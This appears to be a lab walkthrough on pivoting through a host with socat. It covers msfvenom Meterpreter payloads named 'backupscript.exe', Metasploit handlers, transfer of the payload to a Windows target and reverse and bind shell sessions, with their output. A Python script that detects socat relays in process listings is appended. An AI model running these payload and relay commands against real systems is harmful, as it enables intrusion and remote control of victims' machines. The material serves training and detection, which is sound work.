Socat
Socat Redirection
Configure Socat on the Pivot Host
Listens on port 8080 on the pivot host and forwards each connection to the attack host at 10.10.14.18:80, where the Metasploit handler waits for the reverse HTTPS connection.
C:\pivot_host> socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
Create a Meterpreter Payload
Generates a Windows reverse HTTPS payload that connects to the pivot host's internal IP (172.16.5.129) on port 8080, the port Socat is listening on.
C:\mrci0x1> msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 743 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe
Configure the Metasploit Listener
Selects the multi-handler module to catch the reverse connection.
C:\mrci0x1> use exploit/multi/handler
Sets the payload type for the reverse HTTPS connection.
C:\mrci0x1> set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
Configures the listener to bind on all interfaces.
C:\mrci0x1> set lhost 0.0.0.0
lhost => 0.0.0.0
Sets the listener port to 80.
C:\mrci0x1> set lport 80
lport => 80
Starts the listener to wait for the reverse connection.
C:\mrci0x1> run
[*] Started HTTPS reverse handler on https://0.0.0.0:80
Transfer the Payload to the Windows Host
Copies the payload to the pivot host for distribution.
C:\mrci0x1> scp backupscript.exe ubuntu@10.129.202.64:~/
Hosts the payload on the pivot host using an HTTP server.
C:\pivot_host> python3 -m http.server 8123
Downloads the payload from the pivot host to the Windows target.
C:\windows> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"
Receive the Meterpreter Shell
Establishes a Meterpreter session upon payload execution.
[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Staging x64 payload (201308 bytes) ...
[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.18:80 -> 127.0.0.1 ) at 2022-03-07 11:08:10 -0500
meterpreter > getuid
Server username: INLANEFREIGHT\victor
Socat Bind Shell Redirection
Create a Bind Shell Payload
Generates a Windows bind TCP payload that listens on the target itself on port 8443; no LHOST is needed because the handler connects in through the pivot host.
C:\mrci0x1> msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 499 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe
Transfer the Payload to the Windows Host
Copies the payload to the pivot host for distribution.
C:\mrci0x1> scp backupscript.exe ubuntu@10.129.202.64:~/
Hosts the payload on the pivot host using an HTTP server.
C:\pivot_host> python3 -m http.server 8123
Downloads the payload from the pivot host to the Windows target.
C:\windows> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"
Configure Socat on the Pivot Host
Listens on port 8080 on the pivot host and forwards each connection to the bind shell on the Windows target at 172.16.5.19:8443.
C:\pivot_host> socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
Configure the Metasploit Bind Handler
Selects the multi-handler module for the bind shell connection.
C:\mrci0x1> use exploit/multi/handler
Sets the payload type for the bind TCP connection.
C:\mrci0x1> set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
Sets the target host to the pivot host’s external IP.
C:\mrci0x1> set RHOST 10.129.202.64
RHOST => 10.129.202.64
Sets the port to match the Socat listener.
C:\mrci0x1> set LPORT 8080
LPORT => 8080
Starts the bind handler to connect to the Socat listener.
C:\mrci0x1> run
[*] Started bind TCP handler against 10.129.202.64:8080
Establish the Meterpreter Session
Establishes a Meterpreter session via the bind shell.
[*] Sending stage (200262 bytes) to 10.129.202.64
[*] Meterpreter session 1 opened (10.10.14.18:46253 -> 10.129.202.64:8080 ) at 2022-03-07 12:44:44 -0500
meterpreter > getuid
Server username: INLANEFREIGHT\victor
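Both relays above (the reverse HTTPS redirection and the bind shell redirection) leave the same footprint on the pivot host: a socat process whose command line pairs a TCP4-LISTEN address with a TCP4 connect address. The following Python script is an added example, not part of the original page and not code from socat or Metasploit. It parses a constructed `ps -eo pid,user,args` listing, extracts every such relay, and labels whether the destination lies inside an assumed internal segment (172.16.5.0/24, taken from the page's addressing) or outside it. The sample process list, the network assumption and all function names are the example's own.

```python
import ipaddress
import os
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of `ps -eo pid,user,args` output from a pivot host.
# The two socat entries mirror the relays described on this page (reverse
# HTTPS redirection and bind shell redirection); the rest are ordinary
# processes that must not be flagged.
SAMPLE_PS = """\
  PID USER     COMMAND
    1 root     /sbin/init
  611 ubuntu   socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
  640 ubuntu   python3 -m http.server 8123
  702 ubuntu   socat -d -d TCP4-LISTEN:8080,fork,reuseaddr TCP4:172.16.5.19:8443
  745 root     sshd: ubuntu [priv]
  790 ubuntu   bash
"""

# Assumed internal segment behind the pivot host (from the page's addressing).
INTERNAL_NET = ipaddress.ip_network("172.16.5.0/24")

# socat address specs: "TCP4-LISTEN:<port>[,opt,...]" and "TCP4:<host>:<port>[,opt,...]".
# IPv4 literals and hostnames only; bracketed IPv6 literals are not handled here.
LISTEN_RE = re.compile(r"^TCP[46]?-LISTEN:(\d+)(?:,(.*))?$", re.IGNORECASE)
CONNECT_RE = re.compile(r"^TCP[46]?:([^,:]+):(\d+)(?:,(.*))?$", re.IGNORECASE)


@dataclass
class Relay:
    pid: int
    user: str
    listen_port: int
    forks: bool        # ",fork": every accepted client gets its own relay child
    dest_host: str
    dest_port: int
    direction: str     # "outbound" (host outside INTERNAL_NET), "internal" or "unknown"


def classify_destination(host: str, internal_net=INTERNAL_NET) -> str:
    """Label where the relay sends traffic: into the internal segment or out of it."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "unknown"   # hostname rather than a literal address
    return "internal" if addr in internal_net else "outbound"


def parse_socat_relay(pid: int, user: str, cmdline: str,
                      internal_net=INTERNAL_NET) -> Optional[Relay]:
    """Return a Relay if `cmdline` is a socat TCP listen-and-connect relay, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or os.path.basename(argv[0]) != "socat":
        return None
    # Drop socat's own flags (-d, -v, ...); what remains should be two address specs.
    addrs = [a for a in argv[1:] if not a.startswith("-")]
    if len(addrs) != 2:
        return None
    # socat accepts the two addresses in either order, so try both.
    for left, right in ((addrs[0], addrs[1]), (addrs[1], addrs[0])):
        listen, connect = LISTEN_RE.match(left), CONNECT_RE.match(right)
        if listen and connect:
            opts = [o.strip().lower() for o in (listen.group(2) or "").split(",")]
            return Relay(pid=pid, user=user,
                         listen_port=int(listen.group(1)),
                         forks="fork" in opts,
                         dest_host=connect.group(1),
                         dest_port=int(connect.group(2)),
                         direction=classify_destination(connect.group(1), internal_net))
    return None


def find_relays(ps_text: str, internal_net=INTERNAL_NET) -> List[Relay]:
    """Scan `ps -eo pid,user,args` output and return every socat relay found."""
    relays = []
    for line in ps_text.splitlines():
        parts = line.split(None, 2)   # pid, user, full command line
        if len(parts) < 3 or not parts[0].isdigit():
            continue                  # header line or malformed row
        relay = parse_socat_relay(int(parts[0]), parts[1], parts[2], internal_net)
        if relay:
            relays.append(relay)
    return relays


def describe(relay: Relay) -> str:
    """One-line finding suitable for a triage note."""
    return (f"pid {relay.pid} ({relay.user}): listens on tcp/{relay.listen_port}"
            f"{' [fork]' if relay.forks else ''} -> {relay.dest_host}:{relay.dest_port}"
            f" ({relay.direction})")


if __name__ == "__main__":
    for r in find_relays(SAMPLE_PS):
        print(describe(r))
```

Run against the constructed listing, the script reports two findings: pid 611 relaying tcp/8080 outbound to 10.10.14.18:80 (the reverse HTTPS redirection) and pid 702 relaying tcp/8080 into the internal segment at 172.16.5.19:8443 (the bind shell redirection). On a real host, feed it `ps -eo pid,user,args` output and adjust INTERNAL_NET to the segment the host actually sits on; the "outbound" label is the one that marks traffic leaving the segment through a host that has no business forwarding it.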